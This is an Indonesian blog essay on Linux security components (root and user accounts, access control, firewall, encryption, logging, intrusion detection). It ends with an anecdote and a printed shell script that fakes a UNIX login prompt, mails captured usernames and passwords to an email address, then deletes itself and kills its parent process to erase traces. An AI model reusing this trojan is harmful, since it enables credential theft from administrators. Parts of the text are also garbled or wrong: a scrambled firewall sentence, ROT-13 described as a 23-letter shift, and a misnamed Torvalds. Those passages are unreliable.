1.
PENDAHULUAN
Linux merupakan sistem operasi open source nomor satu didunia,
linux juga banyak digunakan sebagai server untuk hosting website yang ada di
internet saat ini. Sistem operasi dengan icon pinguin ini menjadi alternatif
bagi orang yang ingin mendalami jaringan komputer, khususnya di Indonesia.
Linux merupakan alternatif bagi anda yang bosan menggunakan Windows atau Mac
OS.
Linux telah dirancang untuk menawarkan tampilan user interface
yang tidak kalah halus bahkan sangat efektif. Anda dapat menggunakan linux
untuk penggunaan dirumah atau dikantor anda, linux sangat bisa diandalkan.
Linux juga telah menjadi salah satu sistem yang paling banyak digunakan di
dunia. Sebagaian besar pusat data terbesar didunia menggunakan linux. Ada
berbagai alasan mengapa andapun sebaiknya mencoba menggunakan linux.
Sampai dengan saat ini sistem keamanan Linux memang lebih baik
dibandingkan dengan Windows. Itu juga alasan kenapa orang memakai Linux. Linux
sudah sangat aman sejak pertama kali install, jadi tidak perlu takut harus
melakukan setingan tambahan.
2.
PEMBAHASAN
Pengertian Linux
Linux atau GNU/Linux adalah sistem operasi bebas yang
sangat populer untuk computer, Istilah Linux atau GNU/Linux (GNU) juga
digunakan sebagai rujukan kepada keseluruhan distro Linux (Linux distribution),
yang di dalamnya disertakan program-program lain pendukung sistem operasi.
Contoh program tersebut adalah server web, bahasa pemrograman, basisdata,
tampilan desktop (Desktop Environment) (seperti GNOME dan KDE), dan aplikasi
perkantoran (office suite) seperti OpenOffice.org, KOffice, Abiword, Gnumeric.
Distro Linux telah mengalami pertumbuhan yang pesat dari segi popularitas,
sehingga lebih populer dari versi UNIX yang menggunakan sistem lisensi dan
berbayar (proprietary) maupun versi UNIX bebas lain yang pada awalnya
menandingi dominasi Microsoft Windows dalam beberapa sisi. Linux mendukung
banyak perangkat keras komputer, dan telah digunakan di berbagai peralatan dari
komputer pribadi, superkomputer dan sistem benam (embedded system), seperti
telepon seluler (Ponsel) dan perekam video pribadi. Pada awalnya, Linux dibuat,
dikembangkan, dan digunakan oleh peminatnya saja. Kini Linux telah mendapat
dukungan dari perusahaan besar seperti IBM dan Hewlett- Packard. Para pengamat
teknologi informatika beranggapan kesuksesan ini dikarenakan Linux tidak
bergantung kepada vendor (vendor independence), biaya operasional yang rendah,
dan kompatibilitas yang tinggi dibandingkan versi UNIX proprietari, serta
faktor keamanan dan kestabilannya dibandingkan dengan Microsoft Windows.
Ciri-ciri ini juga menjadi bukti atas keunggulan model pengembangan perangkat
lunak sumber terbuka (opensource software). Linux ini disebarkan secara luas
dengan gratis di bawah lisensi GNU
General
Publi License (GPL), yang berarti source code Linux juga tersedia bagi publik.
Linux dikembangkan oleh perorangan maupun kelompok yang bekerja secara
sukarela. Para pengembang Linux memanfaatkan jaringan Internet untuk melakukan
tukar-menukar kode, melaporkan bug, dan membenahi segala masalah yang ada.
Setiap orang yang tertarik biasanya bergabung dalam pengembangan Linux ini.
Pengembangan Linux pertama kali dilakukan oleh Linux Benedict Torvalds pada
tahun 1991 di Universitas Helsinki, Finlandia. Kemudian Linux dikembangkan lagi
dengan bantuan dari banyak programmer dan pakar UNIX di Internet. Linux ini
bisa diperoleh dari beberapa distribusi yang umum digunakan, misalnya RedHat,
Debian, Slackware, Caldera, Stampede Linux, TurboLinux dan lain-lain.
Pengertian UNIX
Unix atau UNIX adalah sebuah sistem operasi komputer
yang diawali dari project Multics (Multiplexed Information and Computing
Service) pada tahun 1965 yang dilakukan American Telephone and Telegraph
AT&T, General Electric (GE), dan Institut Teknologi Massachusetts (MIT),
dengan biaya dari Departemen Pertahanan Amerika (Departement of Defence
Advenced Research Project, DARPA atau ARPA), UNIX didesain sebagai Sistem
operasi yang portable, multi-tasking dan multi-user.
Sistem operasi Unix digunakan secara
luas baik sebagai server atau workstation. Arsitektur Unix dan model
client/server merupakan elemen yang paling penting dalam perkembangan internet
dan mengubah proses komputasi secara terpusat dalam jaringan dari pada proses
tunggal di komputer. Linux, merupakan sistem operasi yang diadopsi dari Unix dan
tersedia secara bebas mendapat popularitas sebagai alternatif dari sistem
operasi proprietary seperti Microsoft Windows
Komponen Arsitektur
Keamanan Linux :
1.
Account Pemakai (user account)
Kekuasaan
dalam mengadministrasi sistem secara keseluruhan berada dalam satu account,
yakni root. Dengan root, Anda bisa mengontrol sistem file, user, sumber daya
(devices), bahkan akses jaringan. Model diktatorial ini memudahkan
administrator dalam menangani sistem. Jika ada satu user yang melanggar aturan,
root bisa membuat account-nya beku, tanpa mengganggu yang lain. Atau mengatur
siapa-siapa saja yang boleh mengakses suatu file, memberikan hak khusus pada
user-user tertentu.. Setiap user diatur pula lingkungan di mana dia boleh
main-main sepuasnya, atau cuma melihat-lihat. Hal ini memberikan keuntungan
bagi pemakai maupun sistem
Keuntungan :
- Kekuasaan dalam satu account yaitu root, sehingga mudah dalam administrasi system.
- Kecerobohan salah satu user tidak berpengaruh kepada system secara keseluruhan.
Masing-masing user memiliki privacy yang ketat
Macam User :
Root : kontrol system file, user, sumber daya
(devices) dan akses jaringan
User
: account dengan kekuasaan yang
diatur oleh root dalam melakukan aktifitas dalam system.
Group : kumpulan user yang
memiliki hak sharing yang sejenis terhadap suatu devices tertentu.
2. Kontrol Akses secara
Diskresi (Discretionary Access control)
Setiap
pemakai Linux, memiliki account tersendiri, yang masing-masing dibedakan dengan
user name dan password. Setiap file memiliki atribut kepemilikan, group, dan
user umum. Satu file, bisa diberikan atribut tertentu, sehingga hanya dapat
dibaca atau dieksekusi oleh pemiliknya saja. Pembatasan ketat ini dinamakan
Discretionary Access Control (DAC). Hal ini pula yang menyebabkan virus jarang
ditemui atau jarang tersebar di Linux. Sebab virus biasanya menulis file ke
dalam sistem. Dengan DAC, virus hanya berpengaruh pada file-file yang dimiliki
oleh salah seorang user yang mengeksekusi virus tersebut. Sedangkan sistemnya
sendiri tidak tersentuh
Discretionary Access
control (DAC) adalah metode pembatasan yang ketat, yang meliputi :
- Setiap account memiliki username dan password sendiri.
- Setiap file/device memiliki atribut(read/write/execution) kepemilikan, group, dan user umum.
3.
Kontrol
Akses Jaringan (Network Access Control)
Linux
dapat memilih komputer mana saja yang dapat mengaksesnya. Pembatasan antar
jaringan ini dinamakan Network Access Control. Alat pengontrolan akses jaringan
ini dinamakan firewall.
Firewall linux 1 :
alat pengontrolan akses
antar jaringan yang membuat linux dapat memilih host yang berhak / tidak berhak mengaksesnya.
Fungsi Firewall linux :
Analisa Memeriksa dan pfailkteert iTngC
Ppa, klaeltu diperlakukan dengan kondisi yang sudah ditentukan, contoh paket A
lakukan tindakan B.
4.
Enkripsi
(Encryption)
Enkripsi
adalah proses mengacak data sehingga tidak dapat dibaca oleh pihak lain. Pada
kebanyakan proses enkripsi, Anda harus menyertakan kunci sehingga data yang
dienkripsi dapat didekripsikan kembali. Ilmu yang mempelajari teknik enkripsi
disebut kriptografi. Gambaran sederhana tentang enkripsi, misalnya mengganti
huruf a dengan n, b dengan m dan seterusnya. Model penggantian huruf sebagai
bentuk enkripsi sederhana ini sekarang tidak dipergunakan secara serius dalam
penyembunyian data. ROT-13 adalah program yang masih suka dipergunakan. Intinya
adalah mengubah huruf menjadi 23 huruf didepannya. Misalnya b menjadi o dan
seterusnya. Pembahasan enkripsi akan terfokus pada enkripsi password dan
enkripsi komunikasi data.
Enkripsi komunikasi data :
Secure Shell (SSH) à Program yang melakukan loging terhadap komputer lain dalam
jaringan, mengeksekusi perintah lewat mesin secara remote dan
memindahkan file dari satu mesin ke mesin
Secure socket Layer (SSL)
mengenkripsi data yang dikirimkan lewat port http.
Konfigurasi dilakukan di : web server APACHE dengan ditambah PATCH
SSL
5.
Logging
Linux memiliki fasilitas logging yang sangat
komprehensif. Untuk yang baru saja bermigrasi ke Linux, mungkin belum terbiasa
memanfaatkan logging. Pada sistem operasi non UNIX, kebanyakan meminimalkan
logging, bahkan tidak ada sama sekali. Logging adalah prosedur di mana sebuah
sistem operasi atau aplikasi merekam setiap kejadian dan menyimpan rekaman
tersebut untuk dapat dianalisa di kemudian hari. Kejadian yang direkam ini bisa
saja menyangkut sistem operasi, atau khusus program-program tertentu saja.
6.
Deteksi
penyusupan (Intrusion Detection)
Deteksi penyusupan adalah aktivitas untuk mendeteksi
penyusupan secara cepat dengan menggunakan program khusus yang otomatis.
Program yang dipergunakan biasanya disebut sebagai Intrusion Detection System
(IDS). Tipe dasar dari IDS adalah:
·
Rule-based systems - berdasarkan atas
database dari tanda penyusupan atau serangan yang telah dikenal. Jika IDS
mencatat lalulintas yang sesuai dengan database yang ada, maka langsung
dikategorikan sebagai penyusupan.
·
Adaptive systems - mempergunakan metode yang
lebih canggih. Tidak hanya berdasarkan database yang ada, tapi juga membuka
kemungkinan untuk mendeteksi terhadap bentuk bentuk penyusupan yang baru.
Contoh kasus Trojan House, memanfaatkan
SHELL script UNIX :
Seorang gadis cantik dan genit peserta
kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola
sistem komputer (administrator pemegang account root . . . hmmm) yang lengah.
Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang
diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja
dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin
password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar
administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit
peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan
di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga
hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih
sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa
homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan
genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam
bentuk shell script yang menyerupai layar login dan password sistem UNIX
sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan
sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD"
| mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila
program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal
penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah,
Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut
menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan.
Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti
pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk
login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul
pesan
Login:root
Password: ********
Login Incorrect
Tentu
saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah)
salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia
mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar
UNIX.
Perhatikan
program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi
password pada layar di atas, setelah itu maka otomatis data login dan password
tersebut akan di email ke mailto:hacker@company.com.
Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password
. . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan
lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya,
yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di
atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di
atas, yaitu
rm $0
kill –9 $PPID
yang
artinya akan segera dilakukan proses penghapusan program my_login dan hapus
pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya
juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses
di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya
ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat
tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker
yang baik memang harus berusaha memancing agar pemilik root menjalankan program
ini.
3.
PENUTUP
KESIMPULAN
Dari sini, Anda sudah mulai mempunyai kepedulian yang
cukup terhadap keamanan jaringan Anda. Secara singkat, sudah pelajari bersama
bagaimana arsitektur keamanan di Linux. Jika keamanan sudah diset secara
maksimal menurut perspektif kita, maka yang diperlukan hanyalah kerajinan
untukmembaca file-file log yang dibuat oleh Linux. Meskipun bisa dibilang bahwa
jaringan tidak mempunyai data-data keamanan yang penting, tapi kepedulian
terhadap masalah keamanan ini akan memudahkan pekerjaan di kemudian hari.
Dengan pesatnya perkembangan sistem informasi, maka perlu bagi para pemelihara
jaringanuntuk tetap terlibat dalam isu-isu terakhir dalam bidang teknologi.
Ketinggalan terhadap isu bug, virus,dan isu keamanan lainnya, akan membuat
jaringan yang dirawat menjadi rawan akan penyusupan.
Tidak ada komentar:
Posting Komentar